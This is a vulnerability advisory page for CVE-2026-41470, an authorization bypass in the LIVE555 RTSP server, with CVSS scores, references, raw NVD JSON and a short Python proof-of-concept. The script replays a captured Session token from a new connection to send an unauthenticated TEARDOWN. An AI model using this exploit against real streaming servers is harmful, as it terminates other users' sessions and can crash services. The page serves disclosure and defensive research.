CVE-2026-41470

Description

LIVE555 before 2026.04.22 contains an authorization bypass vulnerability in RTSP session command handling that allows attackers to replay valid Session tokens from unauthenticated connections. Attackers who obtain a valid Session token can issue PLAY and TEARDOWN commands from a second TCP connection without authentication, causing server crashes through virtual function call errors or disrupting active streams by terminating victim sessions.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

LIVE555 < 2026.04.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# CVE-2026-41470 PoC: LIVE555 Authorization Bypass via Session Replay
# Target: LIVE555 < 2026.04.22
# Description: Replays a valid Session token from a second connection to send commands without auth.

def exploit(target_ip, target_port, session_id):
    # Create a new TCP connection (unauthenticated)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))

    # Construct a TEARDOWN command with the captured Session ID
    # This command usually requires authentication, but is accepted due to the bug
    payload = f"TEARDOWN rtsp://{target_ip}:{target_port}/stream RTSP/1.0\r\n"
    payload += f"Session: {session_id}\r\n"
    payload += f"CSeq: 3\r\n\r\n"

    print(f"[*] Sending malicious TEARDOWN with Session: {session_id}")
    s.send(payload.encode())

    # Receive response
    response = s.recv(1024)
    print(f"[+] Response:\n{response.decode()}")
    s.close()

if __name__ == "__main__":
    # Example usage
    # Attacker needs to sniff or guess a valid session_id first
    target = "192.168.1.100"
    port = 554
    valid_session_id = "1234567890" # Replace with a valid Session ID observed in traffic
    exploit(target, port, valid_session_id)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41470
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41470
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41470/
[4] VulDB https://vuldb.com/cve/CVE-2026-41470
[5] https://download.live555.com/
[6] https://gist.github.com/yhcho0405/ee9b67a96808ef19f22e8a4ee88c795f
[7] https://www.vulncheck.com/advisories/live555-rtsp-server-authorization-bypass-via-session-token

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41470", "sourceIdentifier": "[email protected]", "published": "2026-05-19T19:16:50.440", "lastModified": "2026-05-19T21:08:41.030", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "LIVE555 before 2026.04.22 contains an authorization bypass vulnerability in RTSP session command handling that allows attackers to replay valid Session tokens from unauthenticated connections. Attackers who obtain a valid Session token can issue PLAY and TEARDOWN commands from a second TCP connection without authentication, causing server crashes through virtual function call errors or disrupting active streams by terminating victim sessions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://download.live555.com/", "source": "[email protected]"}, {"url": "https://gist.github.com/yhcho0405/ee9b67a96808ef19f22e8a4ee88c795f", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/live555-rtsp-server-authorization-bypass-via-session-token", "source": "[email protected]"}]}}